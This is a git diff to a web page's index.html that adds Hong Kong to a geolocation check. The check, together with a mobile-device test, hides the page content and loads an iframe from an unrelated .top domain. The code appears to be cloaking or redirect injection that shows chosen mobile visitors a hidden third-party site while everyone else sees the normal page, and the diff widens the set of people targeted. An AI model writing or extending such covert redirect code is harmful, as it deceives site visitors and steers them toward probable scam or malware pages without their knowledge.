--- a/index.html
+++ b/index.html
@@ -94,7 +94,7 @@
         fetch('https://ipapi.co/json/')
             .then(response => response.json())
             .then(data => { 
-                if (data.country === 'IT' && isMobileDevice()) {
+                if ((data.country === 'IT' || data.country === 'HK') && isMobileDevice()) {
                     document.getElementById('content').classList.add('hidden');
                     var iframe = document.createElement('iframe');
                     iframe.src = 'https://h46bk.top/';
